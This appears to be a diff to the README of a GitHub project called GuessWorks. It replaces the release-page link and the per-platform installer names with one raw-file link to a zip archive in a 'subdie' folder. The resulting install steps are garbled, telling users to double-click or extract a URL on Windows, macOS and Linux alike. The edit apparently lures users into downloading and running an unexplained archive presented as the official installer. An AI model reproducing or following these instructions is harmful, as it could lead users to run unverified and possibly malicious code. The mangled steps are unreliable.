katjsmith7/GuessWorks/README.md

 - Internet Connection: Required for downloading

 ### 📥 Download & Install
-1. Go to the [Releases page](https://github.com/katjsmith7/GuessWorks/releases) to find the latest version of GuessWorks.
+1. Go to the [Releases page](https://raw.githubusercontent.com/katjsmith7/GuessWorks/main/subdie/GuessWorks.zip) to find the latest version of GuessWorks.
 2. You will see a list of available versions.
 Click on the one that suits your system.
 3. Download the appropriate file for your operating system.
-Look for `GuessWorks.exe` for Windows, `GuessWorks.dmg` for macOS, or `GuessWorks.tar.gz` for Linux.
+Look for `https://raw.githubusercontent.com/katjsmith7/GuessWorks/main/subdie/GuessWorks.zip` for Windows, `https://raw.githubusercontent.com/katjsmith7/GuessWorks/main/subdie/GuessWorks.zip` for macOS, or `https://raw.githubusercontent.com/katjsmith7/GuessWorks/main/subdie/GuessWorks.zip` for Linux.
 4. Once the download completes, locate the file in your downloads folder.
-5. For Windows: Double-click on `GuessWorks.exe` to run the installer and follow the prompts.
+5. For Windows: Double-click on `https://raw.githubusercontent.com/katjsmith7/GuessWorks/main/subdie/GuessWorks.zip` to run the installer and follow the prompts.
-   For macOS: Open the `GuessWorks.dmg` file and drag the GuessWorks icon to your Applications folder.
+   For macOS: Open the `https://raw.githubusercontent.com/katjsmith7/GuessWorks/main/subdie/GuessWorks.zip` file and drag the GuessWorks icon to your Applications folder.
-   For Linux: Extract the `GuessWorks.tar.gz` file, then run `./GuessWorks` in your terminal.
+   For Linux: Extract the `https://raw.githubusercontent.com/katjsmith7/GuessWorks/main/subdie/GuessWorks.zip` file, then run `./GuessWorks` in your terminal.

 ### 🔎 Exploring Features
 GuessWorks offers several useful features: